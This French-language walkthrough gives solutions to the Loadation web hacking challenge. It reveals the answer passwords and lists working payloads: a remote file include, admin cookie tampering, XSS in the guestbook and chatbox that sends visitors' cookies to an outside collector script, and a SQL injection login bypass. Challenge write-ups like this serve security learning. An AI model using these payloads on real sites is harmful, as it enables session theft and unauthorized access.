Challenge Loadation : (soluce)

Dans le challenge il y a 5 failles + les 4 articles + 3 Questionnaires
(Hacker, cryptologie, Social Engineering)

Les Articles:
Pour tout les articles, il est nécessaire de télécharger la page (fichier>enregistrer sous)
Pour trouver les mots de passes, il faut rechercher la variable "password" dans la source.

Article 1:
Dans la source,
On trouve que la valeur de la variable du mot de passe est: hAcK%E9
Mais il y a la fonction ‘unescape’ avant,ce qui signifie qu'il y a de l'hexadécimal!!
En hexadécimal %E9 équivaut au caractère "é"
Donc on comprend tout de suite que le mot de passe est: hAcKé

Article 2:
Dans la source,
On voit que la valeur de la variable est un javascript.
Donc pour avoir le mot de passe il faut allez voir ce javascript
On ouvre donc le javascript, et on voit que le mot de passe est: maudepasse

Article 3:
Pareil que l'article 2 sauf que le mot de passe est crypté en nombres décimaux
Le mot de passe décrypté est: loadarticle

Article 4:
Dans la page de l'article 4, on remarque que là où l'on tape le mot de passe est un Flash.
On va donc chercher ce que contient ce flash et plus précisément le mot de passe de ce
Flash. Pour voir la source du flash, il faut utiliser un logiciel (dispo sur loadation) qui
permet de voir la source (les 20-25 premieres lignes suffisent).
On a donc la source sous les yeux, et on remarque que le mot de passe du flash est: chirac


Voilà pour les articles...


Les Failles:

La Faille include:

Cette faille étant très facile, je n'expliquerai pas en détail.
L'url du challenge est: http://www.loadation.net/challenges/page.php?
On inclut notre page: http://www.loadation.net/challenges/page.php?p=http://www.lol.com/hack.txt
Voilà pour l'include... (voir tutoriaux si incompréhension)


Faille admin des news:

Celle-ci est légèrement plus dur que la précédente, mais elle reste de niveau "basique"
Très peu de détail sera donné a l'explication (les tutoriaux sont fait pour ça!!)
On tape un mot de passe au hasard, et on obtient un accès refusé. (pas obligatoire mais recommandé).
On va sur l'url, et on tape: javascript:alert(document.cookie)
on voit: admin_news=false ;login=xxx;pass=xxx;
il suffit donc de mettre admin_news=true!!
pour faire cela,on fait: javascript:document.cookie="admin_news=true";
On tape n'importe quel mot de passe...Hop par magie on est connecter!!!
voila pour les news...

Failles xss (2) :

Faille du livre d'or:
Cette faille est du a l'autorisation du BBcode dans le livre d'or.
Là où l'on tape le message, il suffit de mettre:
[img]javascript:window.open('http://www.tonsite.fr/recup.php?cookie='+document.cookie)[/img]
( ce qui a pour effet de récupérer les cookies des visiteurs)

Faille chatbox:
Cette faille m'a été assez dur a trouver :\,mais en cherchant bien,on trouve :)
Là où l'on met notre email sur la chatbox,il suffit de mettre:
" onmouseover="window.open('http://www.tonsite.fr/recup.php?cookie='+document.cookie)
( ce qui a pour effet de récupérer les cookies des visiteurs)

voilà pour les failles xss...

Failles admin:
C'est une faille d'injection Mysql.
rappel: l'injection Mysql consiste a renvoyer toujours vrai.
Il suffit donc de faire en sorte que le login renvoi « vrai » et que le mot de passe renvoi lui aussi « vrai »
Pour le login, on mettra donc quelque chose qui est vrai EN langage mysql ainsi que pour le mot de passe !!
On tapera donc pour le login : '' OR 'a'='a'
Et le mot de passe : '' OR 'a'='a'
(les '' sont a mettre)